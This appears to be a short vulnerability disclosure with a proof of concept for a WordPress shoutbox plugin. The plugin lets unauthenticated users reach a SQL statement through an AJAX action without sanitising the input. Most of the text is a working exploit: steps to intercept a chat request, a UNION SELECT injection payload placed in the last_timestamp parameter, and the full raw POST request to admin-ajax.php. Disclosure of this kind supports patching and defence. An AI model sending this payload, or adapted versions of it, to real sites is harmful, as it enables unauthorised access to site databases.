The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Submit a message in the chatbox, intercept the request using Burp Suite for example.
Edit the request to reflect this request: action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
Send the Request, and it will succeed and also lists previous messages.
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Shoutbox_alias=Guest_209
Connection: close
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default